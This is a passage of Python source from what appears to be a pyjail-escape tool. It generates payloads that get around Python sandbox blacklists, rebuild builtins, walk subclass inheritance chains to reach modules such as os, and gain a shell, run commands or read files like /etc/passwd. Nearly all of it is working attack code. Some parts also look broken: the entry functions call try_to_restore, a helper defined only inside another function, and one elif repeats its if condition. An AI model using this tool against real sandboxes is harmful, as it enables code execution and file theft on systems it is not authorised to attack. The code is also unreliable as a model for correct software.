        "importlib",
        "weakref",
        "reprlib",
        "sys",
        "linecache",
        "pty",
        "io",
        "ctypes",
        "profile",
        "timeit"
    ]
    log_level_ = log_level.upper()
    if log_level_ not in ["DEBUG", "INFO", "TESTING"]:
        logger.warning("[!] Invalid log level, using INFO instead.")
        log_level_ = "INFO"
    if log_level_ == "TESTING":
        log_level_ = "CRITICAL"  # for test scripts
    if log_level_ != "DEBUG":
        from warnings import filterwarnings

        filterwarnings("ignore")
    logger.setLevel(log_level_)
    reminder = (
        {}
    )  # The reminder of bypass method that could not be used in remote (like inheritance chain)
    search_depth = depth  # The maximum search depth for combined bypassing
    if allow_unicode_bypass:
        # test if unicode char is printable
        try:
            print("TESTING [*] unicode test: 𝕒")
            print("\033[2A")
        except UnicodeEncodeError:
            logger.warning(
                "[!] We cannot print unicode in the shell, set allow_unicode_bypass to False."
            )
            logger.warning(
                "[!] Please, change a better shell to enable the unicode feature."
            )
            allow_unicode_bypass = False
    if local_scope == None:
        # If the local scope is not specified, raise a warning.
        logger.info("[*] local scope not specified, using the global scope.")
        logger.debug("[*] current global scope: %s", current_global_scope)
        local_scope = current_global_scope
        local_scope["__builtins__"] = __builtins__
    achivements = {}  # The progress we've gone so far. Being output in the end
    generated_path = (
        {}
    )  # The generated bypassing paths e.g. {'GENERATOR': '(a for a in ()).gi_frame'}
    original_scope = copy(
        local_scope
    )  # fix: In case of some unpickleable objects (like module), using shallow copies
    # changes in local scope comparing to standard builtins
    change_in_builtins = [i for i in local_scope if i in dir(builtins)]

    def try_to_restore(
        data_name: str, check: object = None, end_of_prog=False, cmd=None
    ):
        """
        Try to obtain certain thing from the original scope.
        data_name is a string that can refer to a list in RCE_data.json
        check is a class-type object to check if the payload is valid,
        if not specified, any object will be accepted.
        end_of_prog is a boolean flag to indicate if the program is ending if
        one of the restore success.
        cmd is a string refer to the command executed in the payload.
        """
        data_name_tag = data_name.upper()
        current_scope = get_name_and_object_from_tag(data_name_tag, tagged_scope)
        for _ in current_scope:
            obj = _[1]
            if obj.__class__ == check:
                logger.info("[+] %s exists in the original scope.", data_name)
                achivements[data_name] = [_[0], 1]
                tags.append(data_name_tag)
                generated_path[data_name_tag] = _[0]
                return obj
        path = filter_path_list(RCE_data[data_name], tagged_scope)
        if path:
            logger.info(
                "[*] %d paths found to obtain %s. \
Try to bypass blacklist with them. Please be paitent.",
                len(path),
                data_name,
            )
            logger.debug("[*] %s paths: %s", data_name, str([i[0] for i in path]))
            _ = try_bypasses(
                path,
                banned_chr,
                banned_ast,
                banned_re,
                max_length,
                allow_unicode_bypass,
                tagged_scope,
                cmd,
            )
            if _:
                success = False
                for i in _:
                    # If end of program, no need to exec to check in case of stucking by RCE function like help()
                    if end_of_prog:
                        exec_with_returns_ = lambda _, __: True
                    else:
                        exec_with_returns_ = exec_with_returns
                    result = exec_with_returns_(i, original_scope)
                    original_scope.pop("__return__", None)
                    if (result.__class__ == check or check is None) and (
                        not result is None or end_of_prog
                    ):
                        success = True
                        tagged_scope[i] = [result, data_name_tag]
                        achivements[data_name] = [i, len(_)]
                        tags.append(data_name_tag)
                        generated_path[data_name_tag] = i
                        break
                if success:
                    logger.info("[+] Success. %d payload(s) in total.", len(_))
                    logger.debug(f"[*] payloads: {_}")
                    if end_of_prog:
                        if print_all_payload:
                            bypasses_output(_)
                        bypasses_output(i)
                else:
                    achivements[data_name] = ["None", 0]
                    logger.info(
                        "[-] no way to bypass blacklist to obtain %s.", data_name
                    )
            else:
                achivements[data_name] = ["None", 0]
                logger.info("[-] no way to bypass blacklist to obtain %s.", data_name)
        else:
            achivements[data_name] = ["None", 0]
            logger.info("[-] no paths found to obtain %s.", data_name)

    # Step1: Analyze and tag the local scope
    if "__builtins__" not in local_scope:
        local_scope["__builtins__"] = __builtins__
    # not using | for backward compatibility
    local_scope = merge_dicts(local_scope["__builtins__"], local_scope)
    tagged_scope = tag_scope(local_scope, change_in_builtins)
    # check if we got an UNKNOWN tag
    for i in tagged_scope:
        if tagged_scope[i][0] == "UNKNOWN":
            logger.warning("[!] Unknown object: %s", tagged_scope[i][0])
    logger.debug("[*] tagged scope: %s", tagged_scope)
    tags = [i[1] for i in tagged_scope.values()]
    searched_modules = {
        item: []
        for item in useful_modules
        if item not in get_module_from_tagged_scope(tagged_scope)
    }
    allowed_letters = [
        i for i in ascii_letters + "_" if i not in banned_chr and i not in local_scope
    ]
    obj_list = [i for i in tagged_scope]
    obj_list.sort(key=len)
    string_ords = [i for i in range(32, 127)]
    string_ords.append(10)  # ord('\n') == 10
    for i in string_ords:
        if not is_blacklisted(f"'{chr(i)}'"):
            string_dict[chr(i)] = f"'{chr(i)}'"
        elif not is_blacklisted(f"'{chr(i)}'"):
            string_dict[chr(i)] = f'"{chr(i)}"'
    for index_, i in enumerate(obj_list):
        progress_bar(index_ + 1, len(obj_list))
        obj = tagged_scope[i][0]
        doc = getattr(obj, "__doc__", None)
        if doc:
            for index, j in enumerate(doc):
                if j not in string_dict:
                    payload = i + ".__doc__[" + str(index) + "]"
                    for depth in range(1, search_depth + 1):
                        for _ in BypassGenerator(
                            [payload, []], allow_unicode_bypass, tagged_scope
                        ).generate_bypasses():
                            if is_blacklisted(_):
                                pass
                            string_dict[j] = _
                            reminder[_] = (
                                f"index {index} of {payload} must match the string literal {j}."
                            )
                            break
    print()
    logger.debug("[*] string literals found: %s", string_dict)

    # Step2: Try to exec directly with simple paths
    simple_path = (
        filter_path_list(RCE_data["directly_getshell"], tagged_scope)
        if interactive
        else []
    )
    if simple_path:
        logger.info(
            "[*] %d paths found to directly getshell. \
Try to bypass blacklist with them. Please be paitent.",
            len(simple_path),
        )
        logger.debug("[*] simple paths: %s", str([i[0] for i in simple_path]))
        _ = try_bypasses(
            simple_path,
            banned_chr,
            banned_ast,
            banned_re,
            max_length,
            allow_unicode_bypass,
            tagged_scope,
        )
        if _:
            logger.info(
                "[+] directly getshell success. %d payload(s) in total.", len(_)
            )
            logger.debug("[*] payloads to directly getshell: ")
            logger.debug(_)
            logger.info(
                "[+] You now can use this payload to getshell directly with proper input."
            )
            achivements["directly input bypass"] = [_[0], len(_)]
            if print_all_payload:
                bypasses_output(_)
            bypasses_output(_[0])
        else:
            achivements["directly input bypass"] = ["None", 0]
            logger.info("[-] no way to bypass blacklist to directly getshell.")
    else:
        achivements["directly input bypass"] = ["None", 0]
        logger.info("[-] no paths found to directly getshell.")

    # Step3: Try to find generators
    try_to_restore("generator", (a for a in ()).gi_frame.__class__)

    # Step4: Try to restore type
    try_to_restore("type", type.__class__)

    # Step5: Try to restore object
    try_to_restore("object", object.__class__)

    # Step6: Restore builtins (if possible)
    if "BUILTINS_SET" in tags:  # full lovely builtins set ;)
        logger.info("[*] __builitins__ not deleted, and every builtin is available.")
    elif "BUILTINS_SET_CHANGED" in tags:  # some thing was missing
        logger.info(
            "[*] builitins not fully available (%d is missing) \
in the namespace, try to restore them.",
            len(change_in_builtins),
        )
        builtin_path = filter_path_list(
            RCE_data["restore_builtins_in_current_ns"], tagged_scope
        )
        if builtin_path:
            logger.info(
                "[*] %d paths found to restore builtins. \
Try to bypass blacklist with them. Please be paitent.",
                len(builtin_path),
            )
            logger.debug("[*] restore paths: %s", str([i[0] for i in builtin_path]))
            _ = try_bypasses(
                builtin_path,
                banned_chr,
                banned_ast,
                banned_re,
                max_length,
                allow_unicode_bypass,
                tagged_scope,
            )
            if _:
                logger.info("[+] builtins restored. %d payload(s) in total.", len(_))
                logger.debug("[*] payloads to restore builtins: ")
                logger.debug(_)
                builtin_dict_found_count, builtin_module_found_count = 0, 0
                builtin_dict_payload, builtin_module_payload = None, None
                for i in _:
                    check_result = exec_with_returns(i, original_scope)
                    original_scope.pop("__return__", None)
                    if check_result == __builtins__ and type(check_result) == dict:
                        if not builtin_dict_found_count:
                            logger.info(
                                "[*] Using %s as the restored builtins dict.", i
                            )
                            tagged_scope[i] = [check_result, "BUILTINS_SET"]
                            builtin_dict_payload = i
                            tags.append("BUILTINS_SET")
                            generated_path["BUILTINS_SET"] = i
                        builtin_dict_found_count += 1
                    elif check_result == builtins and type(check_result) == ModuleType:
                        if not builtin_module_found_count:
                            logger.info(
                                "[*] Using %s as the restored builtins module.", i
                            )
                            tagged_scope[i] = [check_result, "MODULE_BUILTINS"]
                            builtin_module_payload = i
                            tags.append("MODULE_BUILTINS")
                            generated_path["MODULE_BUILTINS"] = i
                        builtin_module_found_count += 1
                    else:
                        if (
                            not check_result == builtins
                            and not check_result == __builtins__
                        ):
                            logger.debug("[!] %s is not the restored builtins.", i)
                achivements["builtins set"] = [
                    builtin_dict_payload,
                    builtin_dict_found_count,
                ]
                achivements["builtins module"] = [
                    builtin_module_payload,
                    builtin_module_found_count,
                ]
                if not builtin_dict_payload and not builtin_module_payload:
                    logger.info(
                        "[-] no way to find a bypass method to restore builtins."
                    )
                else:
                    if interactive:
                        try_to_restore(
                            "builtins2RCEinput", end_of_prog=True
                        )  # try to RCE directly with builtins
            else:
                logger.info("[-] no way to find a bypass method to restore builtins.")
        else:
            logger.info("[-] no paths found to restore builtins.")
    else:
        logger.info(
            "[*] __builtins__ in this namespace is deleted, no way to restore it."
        )

    # Step7: Try to restore __builtins__ in other namespaces (if possible)
    # The code is somehow duplicated with the previous step, but I'm not turning it to one func caz
    # it is only used twice.
    if "BUILTINS_SET" not in tags and "MODULE_BUILTINS" not in tags:
        logger.info("[*] try to find __builtins__ in other namespaces.")
        builtin_path = filter_path_list(
            RCE_data["restore_builtins_in_other_ns"], tagged_scope
        )
        if builtin_path:
            logger.info(
                "[*] %d paths found to restore builtins in other namespaces. \
Try to bypass blacklist with them. Please be paitent.",
                len(builtin_path),
            )
            logger.debug("[*] restore paths: %s", str([i[0] for i in builtin_path]))
            _ = try_bypasses(
                builtin_path,
                banned_chr,
                banned_ast,
                banned_re,
                max_length,
                allow_unicode_bypass,
                tagged_scope,
            )
            if _:
                logger.info("[+] builtins restored. %d payload(s) in total.", len(_))
                logger.debug("[*] payloads to restore builtins: ")
                logger.debug(_)
                builtin_dict_found_count, builtin_module_found_count = 0, 0
                builtin_dict_payload, builtin_module_payload = None, None
                for i in _:
                    check_result = exec_with_returns(i, original_scope)
                    original_scope.pop("__return__", None)
                    if check_result == __builtins__ and type(check_result) == dict:
                        if not builtin_dict_found_count:
                            logger.info(
                                "[*] Using %s as the restored builtins dict.", i
                            )
                            tagged_scope[i] = [check_result, "BUILTINS_SET"]
                            builtin_dict_payload = i
                            tags.append("BUILTINS_SET")
                            generated_path["BUILTINS_SET"] = i
                        builtin_dict_found_count += 1
                    elif check_result == builtins and type(check_result) == ModuleType:
                        if not builtin_module_found_count:
                            logger.info(
                                "[*] Using %s as the restored builtins module.", i
                            )
                            tagged_scope[i] = [check_result, "MODULE_BUILTINS"]
                            builtin_module_payload = i
                            tags.append("MODULE_BUILTINS")
                            generated_path["MODULE_BUILTINS"] = i
                        builtin_module_found_count += 1
                    else:
                        if (
                            not check_result == builtins
                            and not check_result == __builtins__
                        ):
                            logger.debug("[!] %s is not the restored builtins.", i)
                achivements["builtins set"] = [
                    builtin_dict_payload,
                    builtin_dict_found_count,
                ]
                achivements["builtins module"] = [
                    builtin_module_payload,
                    builtin_module_found_count,
                ]
                if not builtin_dict_payload and not builtin_module_payload:
                    logger.info(
                        "[-] no way to find a bypass method to restore builtins in other namespaces."
                    )
            else:
                logger.info(
                    "[-] no way to find a bypass method to restore builtins in other namespaces."
                )
        else:
            logger.info("[-] no paths found to restore builtins in other namespaces.")

    if ("BUILTINS_SET" in tags or "MODULE_BUILTINS" in tags) and interactive:
        logger.info("[*] try to RCE directly with builtins.")
        try_to_restore("builtins2RCEinput", end_of_prog=True)

    # Step8: Try inheritance chain
    if "OBJECT" in tags:
        logger.info("[*] Trying to find inheritance chains.")
        subclasses_len = len(subclasses)
        searched_modules_tmp = deepcopy(searched_modules)
        for index, i in enumerate(subclasses):
            progress_bar(index + 1, subclasses_len)
            try:
                for j in searched_modules:
                    if j in i.__init__.__globals__:
                        object_path = generated_path["OBJECT"]
                        payload = [
                            f"OBJECT.__subclasses__()[{index}].__init__.__globals__['{j}']",
                            {"OBJECT": object_path},
                        ]
                        for _ in BypassGenerator(
                            payload,
                            allow_unicode_bypass=allow_unicode_bypass,
                            local_scope=tagged_scope,
                        ).generate_bypasses():
                            if not is_blacklisted(_):
                                result = exec_with_returns(_, original_scope)
                                original_scope.pop("__return__", None)
                                if not result is None:
                                    searched_modules_tmp[j].append(_)
                                    reminder[_] = (
                                        f"{index} is the index of {i.__name__}, path to {j} must fit in index of {i.__name__}."
                                    )
                            continue
            except AttributeError:
                pass
        print()
        for i in useful_modules:
            if i not in searched_modules_tmp:
                # get_name_and_object_from_tag return something like [('os', <module 'os' (built-in)>)]
                achivements[i] = [
                    get_name_and_object_from_tag("MODULE_" + i.upper(), tagged_scope)[
                        0
                    ][0],
                    1,
                ]
        for k in searched_modules_tmp:
            payload = searched_modules_tmp[k]
            if not payload:
                continue
            payload.sort(key=len)
            searched_modules[k].append(payload[0])
            logger.info(f"[+] Found inheritance chain: {payload[0]} -> {k}")
    else:
        logger.info("[*] No object found, skip inheritance chains.")

    # Step9: Try to restore __import__
    try_to_restore("import")
    try_to_restore("load_module")
    try_to_restore("modules")

    # Step10: Try to import modules
    if "IMPORT" in tags:
        logger.info("[*] try to import modules with IMPORT path.")
        for i in useful_modules:
            progress_bar(useful_modules.index(i) + 1, len(useful_modules))
            module_path = ["IMPORT('" + i + "')", {"IMPORT": generated_path["IMPORT"]}]
            for _ in BypassGenerator(
                module_path,
                allow_unicode_bypass=allow_unicode_bypass,
                local_scope=tagged_scope,
            ).generate_bypasses():
                if not is_blacklisted(_):
                    result = exec_with_returns(_, original_scope)
                    original_scope.pop("__return__", None)
                    if not result is None:
                        if result.__name__ == sys.modules[i].__name__:
                            try:
                                searched_modules[i].append(_)
                            except KeyError:
                                pass
        print()
    if "LOAD_MODULE" in tags:
        logger.info("[*] try to import modules with LOAD_MODULE path.")
        for i in useful_modules:
            progress_bar(useful_modules.index(i) + 1, len(useful_modules))
            module_path = [
                "LOAD_MODULE('" + i + "')",
                {"LOAD_MODULE": generated_path["LOAD_MODULE"]},
            ]
            for _ in BypassGenerator(
                module_path,
                allow_unicode_bypass=allow_unicode_bypass,
                local_scope=tagged_scope,
            ).generate_bypasses():
                if not is_blacklisted(_):
                    result = exec_with_returns(_, original_scope)
                    original_scope.pop("__return__", None)
                    if not result is None:
                        if result.__name__ == sys.modules[i].__name__:
                            try:
                                searched_modules[i].append(_)
                            except KeyError:
                                pass
        print()
    if "MODULES" in tags:
        logger.info("[*] try to import modules with MODULES path.")
        for i in useful_modules:
            progress_bar(useful_modules.index(i) + 1, len(useful_modules))
            module_path = [
                "MODULES('" + i + "')",
                {"MODULES": generated_path["MODULES"]},
            ]
            for _ in BypassGenerator(
                module_path,
                allow_unicode_bypass=allow_unicode_bypass,
                local_scope=tagged_scope,
            ).generate_bypasses():
                if not is_blacklisted(_):
                    result = exec_with_returns(_, original_scope)
                    original_scope.pop("__return__", None)
                    if not result is None:
                        if result.__name__ == sys.modules[i].__name__:
                            try:
                                searched_modules[i].append(_)
                            except KeyError:
                                pass
        print()

    # merge searched_modules to tagged_scope
    for module in searched_modules:
        payload_list = searched_modules[module]
        if payload_list:
            payload_list.sort(key=len)
            payload_with_reminder = []
            payload = None
            for i in payload_list:
                for j in reminder:
                    if j in i:
                        payload_with_reminder.append(i)
            for i in payload_list:
                if i not in payload_with_reminder:
                    payload = i
                    break
            if not payload:
                payload = payload_with_reminder[0]
            if module == "__builtins__":
                tag = "BUILTINS_SET"
            else:
                tag = "MODULE_" + module.upper()
            result = exec_with_returns(payload, original_scope)
            original_scope.pop("__return__", None)
            if result:
                tagged_scope[payload] = [result, tag]
                tags.append(tag)
                generated_path[tag] = payload
                achivements[module] = [payload, len(searched_modules[module])]

    # Again, try to restore __import__
    try_to_restore("import")
    try_to_restore("load_module")
    try_to_restore("modules")

    logger.info("[*] modules we have found:")
    logger.info(get_module_from_tagged_scope(tagged_scope))

    # Step11: Try to restore exec functions
    if not find_object(exec, tagged_scope):
        try_to_restore("exec")

    # Step12: Try to RCE directly with builtins
    if ("BUILTINS_SET" in tags or "MODULE_BUILTINS" in tags) and interactive:
        logger.info("[*] try to RCE directly with builtins.")
        try_to_restore("builtins2RCEinput", end_of_prog=True)

    return generated_path


def bypassRCE(
    cmd,
    local_scope: dict = {},
    banned_chr: list = [],
    banned_ast: list = [],
    banned_re: list = [],
    max_length: int = None,
    allow_unicode_bypass: bool = False,
    print_all_payload: bool = False,
    interactive: bool = True,
    depth: int = 5,
    recursion_limit: int = 100,
    log_level: str = "INFO",
):
    """
    The main function to try to RCE in sandbox.

    :param cmd: is the command to execute.
    :param local_scope: is a list of local variables in the sandbox environment.
    :param banned_chr: is a list of blacklisted characters.
    :param banned_ast: is a list of banned AST.
    :param banned_re: is a banned regex.
    :param allow_unicode_bypass: if unicode bypasses are allowed.
    :param depth: is the depth that combined bypassing being generarted.
    :param recursion_limit: is the maximum recursion depth for bypassers.
    :param print_all_payload: if all payloads should be printed.
    :param interactive: if the pyjail is a interactive shell that allows stdin.
    :param log_level: is the logging level, default is INFO, change it to
    DEBUG for more details.
    """
    if cmd == "":
        logger.critical("[!] command is empty, nothing to execute.")
        exit(0)
    generated_path = bypassMAIN(
        local_scope,
        banned_chr=banned_chr,
        banned_ast=banned_ast,
        banned_re=banned_re,
        max_length=max_length,
        allow_unicode_bypass=allow_unicode_bypass,
        interactive=interactive,
        print_all_payload=print_all_payload,
        depth=depth,
        recursion_limit=recursion_limit,
        log_level=log_level,
    )
    try_to_restore("__import__2RCE", end_of_prog=True, cmd=cmd)

    return bypasses_output(generated_path=generated_path)


def bypassREAD(
    filepath,
    mode: str = "eval",
    local_scope: dict = {},
    banned_chr: list = [],
    banned_ast: list = [],
    banned_re: list = [],
    max_length: int = None,
    allow_unicode_bypass: bool = False,
    print_all_payload: bool = False,
    interactive: bool = True,
    depth: int = 5,
    recursion_limit: int = 100,
    log_level: str = "INFO",
):
    """
    The main function to try to RCE in sandbox.

    :param filepath: path to target file (e.g. /etc/passwd).
    :param mode: eval & exec. Based on the execution function used by the targeted sandbox.
    :param local_scope: is a list of local variables in the sandbox environment.
    :param banned_chr: is a list of blacklisted characters.
    :param banned_ast: is a list of banned AST.
    :param banned_re: is a banned regex.
    :param allow_unicode_bypass: if unicode bypasses are allowed.
    :param depth: is the depth that combined bypassing being generarted.
    :param recursion_limit: is the maximum recursion depth for bypassers.
    :param print_all_payload: if all payloads should be printed.
    :param interactive: if the pyjail is a interactive shell that allows stdin.
    :param log_level: is the logging level, default is INFO, change it to
    DEBUG for more details.
    """
    if filepath == "":
        logger.critical("[!] filepath is empty, nothing to read.")
        exit(0)
    generated_path = bypassMAIN(
        local_scope,
        banned_chr=banned_chr,
        banned_ast=banned_ast,
        banned_re=banned_re,
        max_length=max_length,
        allow_unicode_bypass=allow_unicode_bypass,
        depth=depth,
        recursion_limit=recursion_limit,
        interactive=interactive,
        print_all_payload=print_all_payload,
        log_level=log_level,
    )
    mode = mode.lower()
    if mode not in ["eval", "exec"]:
        logger.critical('[!] mode must be either "eval" or "exec".')
        exit(0)
    try_to_restore("filecontentsio", cmd=filepath)
    try_to_restore("filecontentstring", cmd=filepath)
    if mode == "eval":
        try_to_restore("filecontentstring", cmd=filepath, end_of_prog=True)
    elif mode == "exec":
        try_to_restore("filecontentstring", cmd=filepath)
        try_to_restore("print_filecontent", cmd=filepath, end_of_prog=True)
    return bypasses_output(generated_path=generated_path)
